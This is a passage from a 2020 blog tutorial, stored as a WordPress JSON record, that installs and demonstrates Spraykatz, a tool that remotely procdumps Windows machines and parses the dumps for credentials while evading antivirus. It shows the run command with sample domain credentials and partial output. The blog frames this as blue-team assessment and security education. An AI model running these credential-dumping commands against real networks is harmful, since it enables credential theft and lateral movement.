{"id":2322,"date":"2020-03-28T19:29:17","date_gmt":"2020-03-28T17:29:17","guid":{"rendered":"https:\/\/www.identitycosmos.com\/?p=2322"},"modified":"2020-03-28T19:29:17","modified_gmt":"2020-03-28T17:29:17","slug":"spraykatz-a-fantastic-tool-for-blueteam-or-redteam-who-want-to-evaluate-lateral-movement-or-privilege-escalation-weakness-on-active-directory-environments","status":"publish","type":"post","link":"https:\/\/identitycosmos.com\/index.php\/2020\/03\/28\/spraykatz-a-fantastic-tool-for-blueteam-or-redteam-who-want-to-evaluate-lateral-movement-or-privilege-escalation-weakness-on-active-directory-environments\/","title":{"rendered":"Spraykatz : a fantastic tool for Blueteam or Redteam who want to evaluate lateral movement or privilege escalation weakness on Active Directory environments"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf1.png\" alt=\"\"><\/p>\n<h1>Introduction to Spraykatz<\/h1>\n<p>As you may know, password hash dump is a very useful method to perform lateral movement or privilege escalation on a network. If you are using Active Directory, this method will be used by a lot of modern malware which include some code pieces from very known security tools like Mimikatz for example.<\/p>\n<p>In this article, we will explorer Spraykatz (v0.9.6) a magnificent tool written by @lydericlefebvre which can help in different situations:<\/p>\n<ul>\n<li>BlueTeam: you want to evaluate how much sensible you are in term of password hash dump, and detect if some malwares or attackers can use this method to find some privilege accounts traces on your workstations<\/li>\n<li>RedTeam: you want to explore the workstations and find a privilege account to use during your escalation<\/li>\n<li>Security Officer, CISO: you want to demonstrate to your internal people how malware can use password hashes in order to educate your people about security issues<\/li>\n<\/ul>\n<p>Spraykatz is a tool able to <strong>retrieve credentials<\/strong> on <a href=\"https:\/\/www.kitploit.com\/search\/label\/Windows\" target=\"_blank\" title=\"Windows\" rel=\"noopener noreferrer\">Windows<\/a> machines and large <a href=\"https:\/\/www.kitploit.com\/search\/label\/Active%20Directory\" target=\"_blank\" title=\"Active Directory\" rel=\"noopener noreferrer\">Active Directory<\/a> environments. It simply tries to <strong>procdump<\/strong> machines and <strong>parse dumps remotely<\/strong> in order to <strong>avoid detections <\/strong>by <a href=\"https:\/\/www.kitploit.com\/search\/label\/Antivirus\" target=\"_blank\" title=\"antivirus\" rel=\"noopener noreferrer\">antivirus<\/a> softwares as much as possible.<\/p>\n<p>Spraykatz uses slighlty modified parts of the following projects:<\/p>\n<ul>\n<li>Mimikatz<\/li>\n<li>Impacket<\/li>\n<li>Pypykatz<\/li>\n<li>Pywerview<\/li>\n<li>Sysinternals<\/li>\n<li>hackndo<\/li>\n<\/ul>\n<h1>How to install Spraykatz<\/h1>\n<p>For this article I was using a Kali distro, but you can use ubuntu as well (I tested it on both distros and worked like a charm).<\/p>\n<p>Let&#8217;s be root:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>sudo su<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Get information about your system updates and update the index file for future updates:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# apt update<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading package lists&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building dependency tree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading state information&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>All packages are up to date.<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Ok, here I already have everything updated on my Kali system.<\/p>\n<p>If you don&#8217;t have already the last version of python, git and nmap, update it:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:\/tmp\/mimipenguin-master# apt install -y python3.6 python3-pip git nmap<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading package lists&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building dependency tree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Reading state information&#8230; Done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-cups&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-cairo&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-2to3&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-urwid&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-smbc&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;libpython3.6-stdlib&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3.6-crypto&#8217; for regex &#8216;python3.6&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-cairo&#8217; instead of &#8216;python3.6-cairo&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-crypto&#8217; instead of &#8216;python3.6-crypto&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-cups&#8217; instead of &#8216;python3.6-cups&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-smbc&#8217; instead of &#8216;python3.6-smbc&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Note, selecting &#8216;python3-urwid&#8217; instead of &#8216;python3.6-urwid&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>git is already the newest version (1:2.20.1-2).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>git set to manually installed.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>nmap is already the newest version (7.70+dfsg1-6kali1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>nmap set to manually installed.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-cairo is already the newest version (1.16.2-1+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-crypto is already the newest version (2.6.1-9+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-cups is already the newest version (1.9.73-2+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-pip is already the newest version (18.1-5).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-smbc is already the newest version (1.0.15.6-1+b2).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>python3-urwid is already the newest version (2.0.1-2+b1).<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Ok, here I already have everything updated on my Kali system.<\/p>\n<p>Now, our system is ready to install Spraykatz from Github:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# git clone &#8211;recurse-submodules https:\/\/github.com\/aas-n\/spraykatz.git<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Cloning into &#8216;spraykatz&#8217;&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Enumerating objects: 29, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Counting objects: 100% (29\/29), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Compressing objects: 100% (27\/27), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Total 383 (delta 8), reused 5 (delta 1), pack-reused 354<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Receiving objects: 100% (383\/383), 21.51 MiB | 761.00 KiB\/s, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Resolving deltas: 100% (207\/207), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Submodule &#8216;submodules\/impacket&#8217; (https:\/\/github.com\/SecureAuthCorp\/impacket.git) registered for path &#8216;submodules\/impacket&#8217;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Cloning into &#8216;\/root\/spraykatz\/submodules\/impacket&#8217;&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Enumerating objects: 17060, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>remote: Total 17060 (delta 0), reused 0 (delta 0), pack-reused 17060<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Receiving objects: 100% (17060\/17060), 5.64 MiB | 824.00 KiB\/s, done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Resolving deltas: 100% (13026\/13026), done.<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white\"><span style=\"font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Submodule path &#8216;submodules\/impacket&#8217;: checked out &#8216;d6b5bd4e2f3fe3e9fa252dcd2a1dd76faa0c5395&#8217;<\/strong><\/span><br \/>\n<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Now Spraykatz is cloned on your system.<\/p>\n<p>Go to the Spraykatz folder:<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~# cd spraykatz<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>And use pip to install packages from the index (requirements.txt):<\/p>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~\/spraykatz# pip3 install -r requirements.txt<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyCryptodomex in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 1)) (3.6.1)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyasn1 in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 2)) (0.4.2)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: pyOpenSSL in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 3)) (19.0.0)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting pypykatz&gt;=0.3.0 (from -r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/68\/4a\/2436e462a7c9ad3df263f5b14998b664bdc62f2d4352af142b5defafeada\/pypykatz-0.3.2-py3-none-any.whl (271kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 276kB 749kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: lxml in \/usr\/lib\/python3\/dist-packages (from -r requirements.txt (line 5)) (4.3.2)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting minidump&gt;=0.0.11 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/6b\/4e\/ae61bddb6d5ada7ee0e718d08b697a58aba66bdd1428b83e06c5ba914579\/minidump-0.0.11-py3-none-any.whl (62kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 71kB 1.3MB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting minikerberos&gt;=0.0.11 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/ae\/87\/0063d15dcb43a7a0746f57c69dfc1ee86b0608728d40d3791f06fa8b046a\/minikerberos-0.0.11-py3-none-any.whl (96kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 102kB 402kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting msldap&gt;=0.1.1 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/9d\/5b\/a8d65a7a8aa047f0312b0cda890ab06a64c5d3f364374c1603af2acebb95\/msldap-0.2.5-py3-none-any.whl (40kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 40kB 1.1MB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting aiowinreg&gt;=0.0.1 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/59\/25\/31cd1c57c8322e1e88d246d923bb00a88e326722c238b3a466d411d73fd4\/aiowinreg-0.0.2-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting winsspi&gt;=0.0.3 (from pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/65\/fe\/5aa78fe5983f9203cca9453c771711cfe6eafc91870cab7294f201d5d0a8\/winsspi-0.0.3-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: asn1crypto in \/usr\/lib\/python3\/dist-packages (from minikerberos&gt;=0.0.11-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4)) (0.24.0)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting asciitree (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/2d\/6a\/885bc91484e1aa8f618f6f0228d76d0e67000b0fdd6090673b777e311913\/asciitree-0.3.3.tar.gz<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting socks5line&gt;=0.0.3 (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/2f\/51\/9b64da14e5bddb19abd8fd9a0d7c9b564b0e860ae5c52f8090af6dbfa02a\/socks5line-0.0.3-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting aiocmd (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/a7\/d7\/1237391649ab4d86a6d5520361727e938b4ec47df834e688189dd83642bf\/aiocmd-0.1.2-py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Requirement already satisfied: ldap3&lt;2.5.2 in \/usr\/lib\/python3\/dist-packages (from msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4)) (2.5.1)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting prompt-toolkit&gt;=2.0.9 (from aiocmd-&gt;msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/7f\/1f\/e145dd467dc9b0e6f1e64232c03119498dfec497e383f1e8be9f83eaa97e\/prompt_toolkit-3.0.2-py3-none-any.whl (344kB)<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>    100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 348kB 711kB\/s<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Collecting wcwidth (from prompt-toolkit&gt;=2.0.9-&gt;aiocmd-&gt;msldap&gt;=0.1.1-&gt;pypykatz&gt;=0.3.0-&gt;-r requirements.txt (line 4))<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Downloading https:\/\/files.pythonhosted.org\/packages\/7e\/9f\/526a6947247599b084ee5232e4f9190a38f398d7300d866af3ab571a5bfe\/wcwidth-0.1.7-py2.py3-none-any.whl<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Building wheels for collected packages: asciitree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Running setup.py bdist_wheel for asciitree &#8230; done<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>  Stored in directory: \/root\/.cache\/pip\/wheels\/1d\/d9\/58\/9808b306744df0208fccc640d3d9952a5bc7468502d42897d5<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Successfully built asciitree<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Installing collected packages: minidump, minikerberos, asciitree, socks5line, wcwidth, prompt-toolkit, aiocmd, msldap, aiowinreg, winsspi, pypykatz<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>Successfully installed aiocmd-0.1.2 aiowinreg-0.0.2 asciitree-0.3.3 minidump-0.0.11 minikerberos-0.0.11 msldap-0.2.5 prompt-toolkit-3.0.2 pypykatz-0.3.2 socks5line-0.0.3 wcwidth-0.1.7 winsspi-0.0.3<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>Now Spraykatz is fully installed!<\/p>\n<h1>How to use Spraykatz<\/h1>\n<p>Spraykatz is very simple to use. To use it, you will need to determine:<\/p>\n<ul>\n<li>Which account to use to perform the exploration \u2013 here you need to use privilege account (i.e local Admin privilege) on the target system, you may had discovered this type of account from different methods, or even worse, the company is providing regular user accounts which are local Admin on the workstation.<\/li>\n<li>Which machine or which machines range you want to target.<\/li>\n<\/ul>\n<p>In this document example, we will use the following settings:<\/p>\n<ul>\n<li>Active Directory domain: win2019.priv<\/li>\n<li>Account which has local Admin privilege on the target computer: dark<\/li>\n<li>Account password: demo_spraykatz<\/li>\n<li>Target computer: 10.0.0.201<\/li>\n<\/ul>\n<div>\n<table style=\"border-collapse:collapse; background: black\" border=\"0\">\n<colgroup>\n<col style=\"width:1566px\"><\/colgroup>\n<tbody valign=\"top\">\n<tr>\n<td style=\"padding-left: 18px; padding-right: 18px; border-top:  solid 0.5pt; border-left:  solid 0.5pt; border-bottom:  solid 0.5pt; border-right:  solid 0.5pt\"><span style=\"color:#01df01; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>root@kali:~\/spraykatz# .\/spraykatz.py -u dark@win2019.priv -p demo_spraykatz -t 10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf2.png\" alt=\"\"><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong><br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#] Hey, did you read the code?<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Listing targetable machines into networks provided. Can take a while&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Checking local admin access on targets&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[~]   10.0.0.201 is <span style=\"color:#00b050\">pwnable<span style=\"color:white\">!<br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Exec procdump on targets. Be patients&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[~]   ProcDumping <span style=\"color:#00b050\">10.0.0.201<span style=\"color:white\">. Be patient&#8230;<br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Uploading procdump to 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Executing procdump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Creating dump&#8217;s file descriptor on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Parsing 10.0.0.201&#8217;s dump 